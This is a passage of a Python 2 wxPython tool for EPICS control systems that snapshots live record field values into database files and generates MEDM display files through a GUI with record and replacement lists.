'bo': ('anyRecord.adl', 'P', 'R'),
'busy': ('busyRecord.adl', 'P', 'B'),
'calc': ('CalcRecord.adl', 'P', 'C'),
'calcout': ('yyCalcoutRecord.adl', 'P', 'C'),
'compress': ('anyRecord.adl', 'P', 'R'),
'dfanout': ('anyRecord.adl', 'P', 'R'),
'epid': ('pid_control.adl', 'P', 'PID'),
'event': ('anyRecord.adl', 'P', 'R'),
'fanout': ('anyRecord.adl', 'P', 'R'),
'longin': ('anyRecord.adl', 'P', 'R'),
'longout': ('anyRecord.adl', 'P', 'R'),
'mbbi': ('anyRecord.adl', 'P', 'R'),
'mbbiDirect': ('anyRecord.adl', 'P', 'R'),
'mbbo': ('anyRecord.adl', 'P', 'R'),
'mbboDirect': ('anyRecord.adl', 'P', 'R'),
'mca': ('anyRecord.adl', 'P', 'R'),
'motor': ('motorx.adl', 'P', 'M'),
'permissive': ('anyRecord.adl', 'P', 'R'),
'scalcout': ('yysCalcoutRecord.adl', 'P', 'C'),
'scaler': ('anyRecord.adl', 'P', 'R'),
'scanparm': ('anyRecord.adl', 'P', 'R'),
'sel': ('anyRecord.adl', 'P', 'R'),
'seq': ('yySeq.adl', 'P', 'S'),
'sscan': ('scanAux.adl', 'P', 'S'),
'sseq': ('yySseq.adl', 'P', 'S'),
'state': ('anyRecord.adl', 'P', 'R'),
'stringin': ('anyRecord.adl', 'P', 'R'),
'stringout': ('anyRecord.adl', 'P', 'R'),
'sub': ('anyRecord.adl', 'P', 'R'),
'subArray': ('anyRecord.adl', 'P', 'R'),
'swait': ('yyWaitRecord.adl', 'P', 'C'),
'table': ('anyRecord.adl', 'P', 'R'),
'timestamp': ('anyRecord.adl', 'P', 'R'),
'transform': ('yyTransform.adl', 'P', 'T'),
'vme': ('anyRecord.adl', 'P', 'R'),
'waveform': ('anyRecord.adl', 'P', 'R')
}
def writePromptGroupFields(dbdFile, outFile=None):
dbd_object = dbd.readDBD(dbdFile)
if not dbd_object:
return
if (outFile):
fp = open(outFile, "w")
else:
fp = sys.stdout
for r in dbd_object.recordtypeDict.keys():
fp.write("recordtype %s\n" % r)
recordType = dbd_object.recordtypeDict[r]
for fieldName in recordType.fieldList:
fieldDict = recordType.fieldDict[fieldName]
if 'promptgroup' in fieldDict.keys():
fp.write("\t%s (%s)\n" % (fieldName, fieldDict['prompt']))
fp.close
def makeReplaceDict(replaceTargets, replaceStrings):
replaceDict = {}
for i in range(len(replaceTargets)):
replaceDict[replaceTargets[i]] = replaceStrings[i]
return replaceDict
def readDisplayInfoFile(fileName):
global displayInfo
if (fileName):
fp = open(fileName, "r")
else:
#print "readDisplayInfoFile: No filename specified; nothing done."
return displayInfo
di = displayInfo
for line in fp.readlines():
words = line.lstrip().split()
if (len(words) < 3):
continue
if (words[0][0] == '#'):
continue
di[words[0]] = tuple(words[1:])
return di
# Read an existing database to populate or supplement the lists of record names and types
def openDatabase(fileName, recordNames=[], recordTypes=[], displayStrings=[], replaceDict={}):
if (fileName):
file = open(fileName, "r")
else:
#print "openDatabase: No filename specified; nothing done."
return recordNames
for rawLine in file :
global displayInfo
rawLine = rawLine.lstrip()
rawLine = dbd.doReplace(rawLine, replaceDict, reverse=True)
split1 = rawLine.split("(")
#print "openDatabase: split1=%s" % split1
if len(split1[0]) > 0 and split1[0][0] == '#':
continue
if split1[0] == "record":
rType = rawLine.split('(')[1].split(',')[0]
rName = rawLine.split('"') [1]
#print "openDatabase: found record: '%s'" % rName
if rName not in recordNames:
recordNames.append(rName)
recordTypes.append(rType)
if rType in displayInfo.keys():
(prefix, name) = rName.split(':', 1)
prefix = dbd.doReplace(prefix+':', replaceDict)
name = dbd.doReplace(name, replaceDict)
dString = displayInfo[rType][0] + ';'
dString += displayInfo[rType][1] + '=%s,' % prefix
dString += displayInfo[rType][2] + '=%s' % name
displayStrings.append(dString)
else:
#print "no displayInfo for record type '%s'" % rType
displayStrings.append("")
return (recordNames, recordTypes, displayStrings)
nowrite_fields = ['PROC', 'UDF']
# We're using the existence of a "promptgroup()" entry in the record definition to determine
# whether a field can be defined in a database, but really promptgroup only says whether the
# field is *intended* or expected to be defined in a database. Some records do not have promptgroup
# entries for fields that we want to define in the database:
def kludgePromptGroup(recordType, fieldName):
if recordType == "scalcout" and fieldName in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:
return True
if recordType == "sub" and fieldName in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:
return True
return False
def defineNewDatabase(pvList, dbd_object, fixUserCalcs=True):
"""
Software to support the use of run-time programming to prototype an EPICS database.
usage:
defineNewDatabase(pvList, dbd_object, fixUserCalcs=True)
example:
dbd_object = dbd.readDBD("myDBDFile.dbd")
defineNewDatabase(['xxx:myCalc.SCAN','xxx:myTran.DESC'], dbd_object)
Reads all current field values from the records mentioned in 'pvList', and
collects values from live record instances. Field definitions and default
field values are looked up in the dbdClass object, dbd_object; only non-default
values are included.
If you are using actual userCalcs (userTransforms, etc.) to prototype,
you'll probably not want the Enable/Disable support built into userCalcs
to be reproduced in the new database. By default (fixUserCalcs==True),
records whose names begin with '*:user' are treated specially: live values
of the SDIS, DISA, and DISV fields are replaced by default field values.
"""
if not HAVE_CA :
print("Can't import ca_util")
return None
# From pvList, compile a list of unique record instances
recordNameList = [] # just to avoid duplication
recordInstanceList = []
for pv in pvList:
recordName = pv.split('.')[0]
if recordName not in recordNameList:
try:
recordType = caget(recordName+".RTYP")
except:
continue
recordNameList.append(recordName)
recordInstanceList.append(dbd.recordInstance(recordName, recordType))
del recordNameList
for r in recordInstanceList:
recordType = dbd_object.recordtypeDict[r.recordType]
for fieldName in recordType.fieldList:
if recordType.fieldType[fieldName] == 'DBF_NOACCESS':
continue
if fieldName in nowrite_fields:
continue
fieldDict = recordType.fieldDict[fieldName]
if ('special' in fieldDict.keys()):
if (fieldDict['special'] in ['SPC_NOMOD', 'SPC_DBADDR']):
continue
if 'promptgroup' in fieldDict.keys() or kludgePromptGroup(r.recordType, fieldName):
pv = r.recordName+'.'+fieldName
#print("trying %s..." % pv)
try:
value = caget(pv)
except:
value = 0
try:
string_value = caget(pv,req_type=ca.DBR_STRING)
except:
string_value = "Caget failed"
#print("%s='%s'" % (recordName+'.'+fieldName, value))
if string_value != "Caget failed":
if dbd.isDefaultValue(value, r.recordType, fieldName, dbd_object):
continue
if (fixUserCalcs and r.recordName.find(':user') and
fieldName in ['DISA', 'DISV', 'SDIS']):
continue
r.fieldNames.append(fieldName)
r.fieldValues.append(string_value)
return recordInstanceList
def writeNewDatabase(fileName, pvList, dbdFileName, replaceDict=None, fixUserCalcs=True):
dbd_object = dbd.readDBD(dbdFileName)
recordInstanceList = defineNewDatabase(pvList, dbd_object, fixUserCalcs)
dbd.writeDatabase(fileName, recordInstanceList, replaceDict)
def writeColorTable(fp):
fp.write('"color map" {\n\tncolors=65\n\tcolors {\n\t\tffffff,\n\t\tececec,\n\t\tdadada,\n\t\tc8c8c8,\n')
fp.write('\t\tbbbbbb,\n\t\taeaeae,\n\t\t9e9e9e,\n\t\t919191,\n\t\t858585,\n\t\t787878,\n\t\t696969,\n')
fp.write('\t\t5a5a5a,\n\t\t464646,\n\t\t2d2d2d,\n\t\t000000,\n\t\t00d800,\n\t\t1ebb00,\n\t\t339900,\n')
fp.write('\t\t2d7f00,\n\t\t216c00,\n\t\tfd0000,\n\t\tde1309,\n\t\tbe190b,\n\t\ta01207,\n\t\t820400,\n')
fp.write('\t\t5893ff,\n\t\t597ee1,\n\t\t4b6ec7,\n\t\t3a5eab,\n\t\t27548d,\n\t\tfbf34a,\n\t\tf9da3c,\n')
fp.write('\t\teeb62b,\n\t\te19015,\n\t\tcd6100,\n\t\tffb0ff,\n\t\td67fe2,\n\t\tae4ebc,\n\t\t8b1a96,\n')
fp.write('\t\t610a75,\n\t\ta4aaff,\n\t\t8793e2,\n\t\t6a73c1,\n\t\t4d52a4,\n\t\t343386,\n\t\tc7bb6d,\n')
fp.write('\t\tb79d5c,\n\t\ta47e3c,\n\t\t7d5627,\n\t\t58340f,\n\t\t99ffff,\n\t\t73dfff,\n\t\t4ea5f9,\n')
fp.write('\t\t2a63e4,\n\t\t0a00b8,\n\t\tebf1b5,\n\t\td4db9d,\n\t\tbbc187,\n\t\ta6a462,\n\t\t8b8239,\n')
fp.write('\t\t73ff6b,\n\t\t52da3b,\n\t\t3cb420,\n\t\t289315,\n\t\t1a7309,\n\t}\n}\n')
import math
def makeGrid(geom, border, maxWidth, maxHeight):
numDisplays = len(geom)
numX = max(1,int(round(math.sqrt(numDisplays), 0)))
numY = max(1, int(numDisplays / numX))
if numX*numY < numDisplays: numY += 1
#print "numDisplays, numX, numY=", numDisplays, numX, numY
if maxWidth > maxHeight*2:
numX = max(1,int(round(numX/2, 0)))
numY = max(1, int(numDisplays / numX))
if numX*numY < numDisplays: numY += 1
elif maxHeight > maxWidth*2:
numY = max(1,int(round(numY/2, 0)))
numX = max(1, int(numDisplays / numY))
if numX*numY < numDisplays: numX += 1
#print "numDisplays, numX, numY=", numDisplays, numX, numY
ix = -1
iy = 0
newGeom = []
maxWidth += border
maxHeight += border
for i in range(len(geom)):
ix += 1
if ix >= numX:
ix = 0
iy += 1
newGeom.append((border+ix*maxWidth, border+iy*maxHeight, geom[i][2], geom[i][3]))
totalWidth = numX * maxWidth + border
totalHeight = numY * maxHeight + border
return (newGeom, totalWidth, totalHeight)
def writeNewMEDM_Composites(fileName, recordNames, recordTypes, displayStrings=[], replaceDict={}, EPICS_DISPLAY_PATH=[]):
geom=[]
totalWidth = 0
totalHeight = 10
maxWidth = 0
maxHeight = 0
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(display, macro) = displayString.split(';')
displayFile = findFileInPath(display, EPICS_DISPLAY_PATH)
if not displayFile:
print "Can't find display file '%s' in EPICS_DISPLAY_PATH" % display
return
#print "writeNewMEDM_Composites: displayFile = ", displayFile
dFile = open(displayFile, "r")
lines = dFile.readlines()
dFile.close()
for i in range(len(lines)):
line = lines[i].lstrip()
if line.startswith('width'):
width = int(line.split('=')[1])
height = int(lines[i+1].lstrip().split('=')[1])
geom.append((10, totalHeight, width, height))
maxWidth = max(maxWidth, width)
maxHeight = max(maxHeight, height)
totalWidth = max(width, totalWidth)
totalHeight += height+10
break
totalWidth += 20
#print "writeNewMEDM_Composites: displayFile '%s'; w=%d,h=%d " % (displayFile, width, height)
(geom, totalWidth, totalHeight) = makeGrid(geom, 10, maxWidth, maxHeight)
if (fileName):
fp = open(fileName, "w")
else:
fp = sys.stdout
fp.write('\nfile {\n\tname="%s"\n\tversion=030102\n}\n' % fileName)
fp.write('display {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' %
(100, 100, totalWidth, totalHeight))
fp.write('\tclr=14\n\tbclr=4\n\tcmap=""\n\tgridSpacing=5\n\tgridOn=0\n\tsnapToGrid=0\n}\n')
writeColorTable(fp)
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(x,y,w,h) = geom[i]
fp.write('composite {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' % (x,y, w, h))
(display, macro) = displayString.split(';')
newMacro = dbd.doReplace(macro, replaceDict)
newName = dbd.doReplace(rName, replaceDict)
fp.write('\t"composite name"=""\n')
fp.write('\t"composite file"="%s;%s"\n}\n' % (display, newMacro))
fp.close()
def writeNewMEDM_RDButtons(fileName, recordNames, recordTypes, displayStrings=[], replaceDict={}, EPICS_DISPLAY_PATH=[]):
if (fileName):
file = open(fileName, "w")
else:
file = sys.stdout
file.write('\nfile {\n\tname="%s"\n\tversion=030102\n}\n' % fileName)
file.write('display {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' % (100, 100, 200, 20+len(recordNames)*25))
file.write('\tclr=14\n\tbclr=4\n\tcmap=""\n\tgridSpacing=5\n\tgridOn=0\n\tsnapToGrid=0\n}\n')
writeColorTable(file)
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
file.write('"related display" {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=150\n\t\theight=20\n\t}\n' % (10, 10+i*25))
(display, macro) = displayString.split(';')
newMacro = dbd.doReplace(macro, replaceDict)
newName = dbd.doReplace(rName, replaceDict)
file.write('\tdisplay[0] {\n\t\tlabel="%s"\n\t\tname="%s"\n\t\targs="%s"\n\t}\n' % (newName, display, newMacro))
file.write('\tclr=14\n\tbclr=51\n\tlabel="%c%s"\n}\n' % ('-', newName))
file.close()
# For now, the following function can write an medm file for only a single record
def writeNewMEDM_Objects(fileName, recordNames, recordTypes, displayStrings=[], replaceDict={}, EPICS_DISPLAY_PATH=[]):
geom=[]
totalWidth = 0
totalHeight = 10
maxWidth = 0
maxHeight = 0
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(display, macro) = displayString.split(';')
displayFile = findFileInPath(display, EPICS_DISPLAY_PATH)
if not displayFile:
print "Can't find display file '%s' in EPICS_DISPLAY_PATH" % display
return
#print "writeNewMEDM_Composites: displayFile = ", displayFile
dFile = open(displayFile, "r")
lines = dFile.readlines()
dFile.close()
for i in range(len(lines)):
line = lines[i].lstrip()
if line.startswith('width'):
width = int(line.split('=')[1])
height = int(lines[i+1].lstrip().split('=')[1])
geom.append((10, totalHeight, width, height))
maxWidth = max(maxWidth, width)
maxHeight = max(maxHeight, height)
totalWidth = max(width, totalWidth)
totalHeight += height+10
break
totalWidth += 20
#print "writeNewMEDM_Composites: displayFile '%s'; w=%d,h=%d " % (displayFile, width, height)
# Get only the lines we'll use from the medm file
startLine = 0
for i in range(len(lines)):
if (lines[i].startswith('"color map')):
numColors = int(lines[i+1].split("=")[1])
startLine = i+numColors+5
#print "start line:", lines[startLine]
(geom, totalWidth, totalHeight) = makeGrid(geom, 10, maxWidth, maxHeight)
if (fileName):
fp = open(fileName, "w")
else:
fp = sys.stdout
fp.write('\nfile {\n\tname="%s"\n\tversion=030102\n}\n' % fileName)
fp.write('display {\n\tobject {\n\t\tx=%d\n\t\ty=%d\n\t\twidth=%d\n\t\theight=%d\n\t}\n' %
(100, 100, totalWidth, totalHeight))
fp.write('\tclr=14\n\tbclr=4\n\tcmap=""\n\tgridSpacing=5\n\tgridOn=0\n\tsnapToGrid=0\n}\n')
writeColorTable(fp)
for i in range(len(recordNames)):
rName = recordNames[i]
rType = recordTypes[i]
displayString = displayStrings[i]
(display, macro) = displayString.split(';')
macros = macro.split(",")
rDict = {}
for m in macros:
(target, replacement) = m.split("=")
target = '$(%s)' % target
rDict[target] = replacement
(x,y,w,h) = geom[i]
for line in lines[startLine:]:
l = dbd.doReplace(line, rDict)
fp.write(dbd.doReplace(l, replaceDict))
fp.close()
###################################################################
# GUI STUFF
###################################################################
# From Python Cookbook
import re
re_digits = re.compile(r'(\d+)')
def embedded_numbers(s):
pieces = re_digits.split(s) # split into digits/nondigits
pieces[1::2] = map(int, pieces[1::2]) # turn digits into numbers
return pieces
def sort_strings_with_embedded_numbers(alist):
aux = [ (embedded_numbers(s), s) for s in alist ]
aux.sort()
return [ s for __, s in aux ] # convention: __ means "ignore"
def cmpStringsWithEmbeddedNumbers(s1, s2):
if s1 == s2: return 0
ss = sort_strings_with_embedded_numbers([s1,s2])
if ss[0] == s1: return 1
return -1
def parseReplacementsFromEnvString(s):
replacements = s.split(',')
replaceDict = {}
for rep in replacements:
target, string = rep.split('=')
replaceDict[target]=string
return replaceDict
def findFileInPath(file, pathList):
for path in pathList:
fullPath = os.path.join(path, file)
if os.path.isfile(fullPath):
return(fullPath)
return("")
class myList(wx.ListCtrl, listmix.ColumnSorterMixin, listmix.ListCtrlAutoWidthMixin, listmix.TextEditMixin):
def __init__(self, parent, frame, purpose):
wx.ListCtrl.__init__(
self, parent, -1, style=wx.LC_REPORT|wx.LC_HRULES|wx.LC_VRULES)
listmix.ListCtrlAutoWidthMixin.__init__(self)
self.parent = parent
self.frame = frame
self.purpose = purpose
self.itemDataMap = {}
if purpose == "recordNames":
numColumns = 3
self.InsertColumn(0, "Record name")
self.InsertColumn(1, "Record type")
self.InsertColumn(2, "Display string")
else:
numColumns = 2
self.InsertColumn(0, "Live string")
self.InsertColumn(1, "In-File string")
# fill list
if self.purpose == "recordNames":
i = 0
if len(self.frame.recordNames) > 0:
for i in range(len(self.frame.recordNames)):
self.itemDataMap[i] = (self.frame.recordNames[i], self.frame.recordTypes[i], self.frame.displayStrings[i])
i += 1
self.itemDataMap[i] = (
"Record name",
"Record type",
"abc.adl;P=$(P),R=yy"
)
else:
i = 0
if len(self.frame.replaceTargets) > 0:
for i in range(len(self.frame.replaceTargets)):
self.itemDataMap[i] = (self.frame.replaceTargets[i], self.frame.replaceStrings[i])
i += 1
self.itemDataMap[i] = (
"Live string",
"In-File string",
)
self.lastKey = i
items = self.itemDataMap.items()
for (i, data) in items:
self.InsertStringItem(i, data[0])
self.SetItemData(i, i)
self.SetStringItem(i, 1, data[1])
if numColumns > 2:
self.SetStringItem(i, 2, data[2])
self.SetItemTextColour(self.lastKey, "red")
listmix.ColumnSorterMixin.__init__(self, numColumns)
listmix.TextEditMixin.__init__(self)
for i in range(numColumns):
self.SetColumnWidth(i, wx.LIST_AUTOSIZE)
# Bind events to code
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected, self)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnItemDeselected, self)
self.selectedItems = set()
# for wxMSW
self.Bind(wx.EVT_COMMAND_RIGHT_CLICK, self.OnRightClick)
# for wxGTK
self.Bind(wx.EVT_RIGHT_UP, self.OnRightClick)
# for edit veto
#self.Bind(wx.EVT_COMMAND_LIST_BEGIN_LABEL_EDIT, self.OnEditRequest)
def SetStringItem(self, index, col, data):
#if self.purpose == "recordNames":
# print "SetStringItem: index=", index, " col=", col, " data='%s'" % data
# print "SetStringItem: GetItemData(%d)=%d" % (index, self.GetItemData(index))
if index < len(self.frame.displayStrings) and col == 2: #only for this column do we permit edits (only medm display string)
wx.ListCtrl.SetStringItem(self, index, col, data)
self.frame.displayStrings[self.GetItemData(index)] = str(data)
# if self.purpose == "recordNames":
# print "displayStrings='%s'\n" % self.frame.displayStrings
else:
wx.ListCtrl.SetStringItem(self, index, col, self.itemDataMap[index][col])
def GetListCtrl(self):
return self
def GetColumnSorter(self):
"""Returns a callable object to be used for comparing column values when sorting."""
return self.__ColumnSorter
def __ColumnSorter(self, key1, key2):
col = self._col
ascending = self._colSortFlag[col]
if key1 == self.lastKey:
return 1
if key2 == self.lastKey:
return -1
item1 = self.itemDataMap[key1][col]
item2 = self.itemDataMap[key2][col]
cmpVal = cmpStringsWithEmbeddedNumbers(item1, item2)
if cmpVal == 0:
item1 = self.itemDataMap[key1][0]
item2 = self.itemDataMap[key2][0]
#cmpVal = locale.strcoll(str(item1), str(item2))
cmpVal = cmpStringsWithEmbeddedNumbers(item1, item2)
if cmpVal == 0:
cmpVal = key1 < key2
if ascending:
return cmpVal
else:
return -cmpVal
# evidently there is a way to veto a list-edit event, and I'd like to
# do this, but don't know how. Here's some test code motivated by the OpenEditor
# function from wx.lib.mixins.listctrl.py's TextEditMixin class.
def OnEditRequest(self, event):
pass
#print "OnEditRequest: event=", event, " row=", event.m_itemIndex, " col=", event.m_col
def OnItemSelected(self, event):
self.selectedItems.add(event.m_itemIndex)
#print "OnItemSelected: GetIndex=%d" % event.GetIndex()
listmix.TextEditMixin.OnItemSelected(self, event)
event.Skip()
def OnItemDeselected(self, event):
if event.m_itemIndex in self.selectedItems:
self.selectedItems.remove(event.m_itemIndex)
event.Skip()
def OnRightClick(self, event):
# only do this part the first time so the events are only bound once
if not hasattr(self, "popupID1"):
self.popupID1 = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnPopupOne, id=self.popupID1)
if self.purpose == "recordNames":
self.popupID2 = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnPopupTwo, id=self.popupID2)
if (len(self.itemDataMap) <= 1):
return
# make a menu
menu = wx.Menu()
# add some items
menu.Append(self.popupID1, "Delete from list")
if self.purpose == "recordNames":
menu.Append(self.popupID2, "Write MEDM display for this record")
# Popup the menu. If an item is selected then its handler
# will be called before PopupMenu returns.
self.PopupMenu(menu)
menu.Destroy()
def OnPopupOne(self, event):
#print "OnPopupOne"
#print "selected items:", self.selectedItems
items = list(self.selectedItems)
item = items[0]
if self.purpose == "recordNames":
if item < len(self.frame.recordNames):
self.DeleteItem(item)
del self.frame.recordNames[item]
del self.frame.recordTypes[item]
del self.frame.displayStrings[item]
#print "records:", self.frame.recordNames
else:
if item < len(self.frame.replaceTargets):
self.DeleteItem(item)
del self.frame.replaceTargets[item]
del self.frame.replaceStrings[item]
#print "replaceTargets:", self.frame.replaceTargets
# Although self.selectedItems may contain several items, we're only going to
# write a file for the first one.
def OnPopupTwo(self, event):
#print "OnPopupTwo"
#print "selected items:", self.selectedItems
if (len(self.itemDataMap) <= 1):
return
global medmPath
if len(self.frame.recordNames) <= 0:
return
wildcard = "(*.adl)|*.adl|All files (*.*)|*.*"
if medmPath == "":
medmPath = os.getcwd()
items = list(self.selectedItems)
item = items[0]
if item >= len(self.frame.recordNames):
return
recordNameList = [self.frame.recordNames[item]]
fileName = recordNameList[0]
if fileName.find(":"):
fileName = fileName.split(":")[1]
fileName += ".adl"
dlg = wx.FileDialog(self, message="Save as ...",
defaultDir=medmPath, defaultFile=fileName, wildcard=wildcard,
style=wx.SAVE | wx.CHANGE_DIR)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
medmPath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and medmPath:
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
recordNameList = [self.frame.recordNames[item]]
recordTypeList = [self.frame.recordTypes[item]]
displayStringList = [self.frame.displayStrings[item]]
replaceDict = makeReplaceDict(self.frame.replaceTargets, self.frame.replaceStrings)
writeNewMEDM_Objects(medmPath, recordNameList, recordTypeList, displayStringList, replaceDict, self.frame.EPICS_DISPLAY_PATH)
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
class myListPanel(wx.Panel):
def __init__(self, parent, frame, purpose):
wx.Panel.__init__(self, parent, -1, style=wx.BORDER_SUNKEN)
#wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.frame = frame
self.purpose = purpose
sizer = wx.BoxSizer(wx.VERTICAL)
if purpose == "recordNames":
title = wx.StaticText(self, -1, "Record list: Click column head to sort.\nRight click on entry to delete, or write MEDM file.\nLeft click in display string to edit. (Note that entire item must be visible to edit it.)")
else:
title = wx.StaticText(self, -1, "Replacement list: Click column head to sort.\nRight click on entry to delete.")
sizer.Add(title, 0, wx.ALL, 5)
self.list = myList(self, self.frame, self.purpose)
sizer.Add(self.list, 1, wx.LEFT|wx.RIGHT|wx.EXPAND, 5)
self.SetSizer(sizer)
class MainPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.bottomWin = wx.SashLayoutWindow(self, -1, (-1,-1), (200, 30), wx.SW_3D)
self.bottomWin.SetDefaultSize((-1, 25))
self.bottomWin.SetOrientation(wx.LAYOUT_HORIZONTAL)
self.bottomWin.SetAlignment(wx.LAYOUT_BOTTOM)
# Doesn't work; have to do it by hand in self.OnSashDrag()
#self.bottomWin.SetMinimumSizeY(30)
self.topWin = wx.SashLayoutWindow(self, -1, (-1,-1), (-1, -1), wx.SW_3D)
(x,y) = self.parent.GetClientSize()
self.topWin.SetDefaultSize((-1, y-30))
self.topWin.SetOrientation(wx.LAYOUT_HORIZONTAL)
self.topWin.SetAlignment(wx.LAYOUT_TOP)
self.topWin.SetSashVisible(wx.SASH_BOTTOM, True)
self.topWin.SetMinimumSizeY(30)
self.Bind(wx.EVT_SASH_DRAGGED, self.OnSashDrag, id=self.topWin.GetId())
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnSashDrag(self, event):
#print "OnSashDrag: height=", event.GetDragRect().height
(pW, pH) = self.parent.GetClientSize()
#print "OnSashDrag: clientHeight=", pH
eobj = event.GetEventObject()
height = event.GetDragRect().height
topWinHeight = max(30, min(pH-30, height))
# Because bottomWin was created first, LayoutWindow doesn't care
# about topWin's default size
#self.topWin.SetDefaultSize((-1, topWinHeight))
self.bottomWin.SetDefaultSize((-1, pH-topWinHeight))
wx.LayoutAlgorithm().LayoutWindow(self, None)
def OnSize(self, event):
#print "OnSize: height=", self.parent.GetClientSize()[1]
wx.LayoutAlgorithm().LayoutWindow(self, None)
class TopFrame(wx.Frame):
global displayInfo
def __init__(self, parent, id, title, **kwds):
wx.Frame.__init__(self, parent, id, title, **kwds)
self.width = None
self.height = None
# init data structures
self.dbd = None
if os.environ.has_key('SNAPDB_DBDFILE'):
self.dbdFileName = os.environ['SNAPDB_DBDFILE']
self.dbd = dbd.readDBD(self.dbdFileName)
else:
self.dbdFileName = "<NOT YET SPECIFIED> (Use 'File' menu to open DBD file.)"
self.displayInfoFileName = "<using internal displayInfo>"
self.recordNames = []
self.recordTypes = []
self.displayStrings = []
self.replaceTargets = []
self.replaceStrings = []
if os.environ.has_key('SNAPDB_REPLACEMENTS'):
replaceDict = parseReplacementsFromEnvString(os.environ['SNAPDB_REPLACEMENTS'])
for k in replaceDict.keys():
self.replaceTargets.append(k)
self.replaceStrings.append(replaceDict[k])
if os.environ.has_key('SNAPDB_DISPLAYINFOFILE'):
global displayInfo
self.displayInfoFileName = os.environ['SNAPDB_DISPLAYINFOFILE']
displayInfo = readDisplayInfoFile(self.displayInfoFileName)
self.EPICS_DISPLAY_PATH = ['.']
if os.environ.has_key('EPICS_DISPLAY_PATH'):
self.EPICS_DISPLAY_PATH = os.environ['EPICS_DISPLAY_PATH'].split(':')
self.fixUserCalcs = True
# make menuBar
menu1 = wx.Menu()
menu1.Append(101, "Open DBD file", "Open .dbd file")
menu1.Append(102, "Open database file", "Open database file")
menu1.Append(103, "Write database file", "Write database file")
menu1.Append(104, "Write MEDM-display file (buttons)", "Write MEDM-display file (buttons)")
menu1.Append(105, "Write MEDM-display file (composites)", "Write MEDM-display file (composites)")
menu1.Append(106, "Read displayInfo file", "Read displayInfo file")
menu1.Append(wx.ID_EXIT, "E&xit\tAlt-X", "Exit this application")
self.Bind(wx.EVT_MENU, self.on_openDBD_MenuSelection, id=101)
self.Bind(wx.EVT_MENU, self.on_openDB_MenuSelection, id=102)
self.Bind(wx.EVT_MENU, self.on_writeDB_MenuSelection, id=103)
self.Bind(wx.EVT_MENU_RANGE, self.on_writeMEDM_MenuSelection, id=104, id2=105)
self.Bind(wx.EVT_MENU, self.on_readDI_MenuSelection, id=106)
self.Bind(wx.EVT_MENU, self.on_Exit_Event, id=wx.ID_EXIT)
menuBar = wx.MenuBar()
menuBar.Append(menu1, "&File")
self.SetMenuBar(menuBar)
# make statusBar
statusBar = self.CreateStatusBar()
statusBar.SetFieldsCount(1)
self.mainPanel = MainPanel(self)
self.fillMainPanel()
def on_Exit_Event(self, event):
self.Close()
def fillMainPanel(self):
topPanel = wx.Panel(self.mainPanel.topWin, style=wx.BORDER_SUNKEN)
topPanelSizer = wx.BoxSizer(wx.VERTICAL)
topPanel.SetSizer(topPanelSizer)
text1 = wx.StaticText(topPanel, -1, ".dbd File: %s" % self.dbdFileName)
text2 = wx.StaticText(topPanel, -1, "displayInfo File: %s" % self.displayInfoFileName)
topPanelSizer.Add(text1, 0, wx.LEFT|wx.TOP, 5)
topPanelSizer.Add(text2, 0, wx.LEFT|wx.BOTTOM, 5)
workPanel = wx.Panel(topPanel, style=wx.BORDER_SUNKEN)
workPanelSizer = wx.BoxSizer(wx.HORIZONTAL)
workPanel.SetSizer(workPanelSizer)
# records panel
recordsPanel = wx.Panel(workPanel)
recordsPanelSizer = wx.BoxSizer(wx.VERTICAL)
recordsPanel.SetSizer(recordsPanelSizer)
rap = wx.Panel(recordsPanel)
rapSizer = wx.BoxSizer(wx.HORIZONTAL)
lt = wx.StaticText(rap, -1, "add new record:")
rt = wx.TextCtrl(rap, -1, "", size=(200,-1), style=wx.TE_PROCESS_ENTER)
rapSizer.Add(lt, 0, 0)
rapSizer.Add(rt, 1, 0)
rap.SetSizer(rapSizer)
self.Bind(wx.EVT_TEXT_ENTER, self.addRecordName, rt)
recordsPanelSizer.Add(rap, 0, wx.ALL, 5)
rlp = myListPanel(recordsPanel, self, "recordNames")
recordsPanelSizer.Add(rlp, 1, wx.EXPAND|wx.ALL, 5)
# replacements panel
replacementsPanel = wx.Panel(workPanel)
replacementsPanelSizer = wx.BoxSizer(wx.VERTICAL)
replacementsPanel.SetSizer(replacementsPanelSizer)
rap = wx.Panel(replacementsPanel)
rapSizer = wx.BoxSizer(wx.HORIZONTAL)
lt = wx.StaticText(rap, -1, "add new replacement\n(e.g., 'xxx=abc')")
rt = wx.TextCtrl(rap, -1, "", size=(200,-1), style=wx.TE_PROCESS_ENTER)
rapSizer.Add(lt, 0, 0)
rapSizer.Add(rt, 1, 0)
rap.SetSizer(rapSizer)
self.Bind(wx.EVT_TEXT_ENTER, self.addReplacement, rt)
replacementsPanelSizer.Add(rap, 0, wx.ALL, 5)
rlp = myListPanel(replacementsPanel, self, "replacements")
replacementsPanelSizer.Add(rlp, 1, wx.EXPAND|wx.ALL, 5)
workPanelSizer.Add(recordsPanel, 5, wx.EXPAND|wx.ALL, 5)
workPanelSizer.Add(replacementsPanel, 2, wx.EXPAND|wx.ALL, 5)
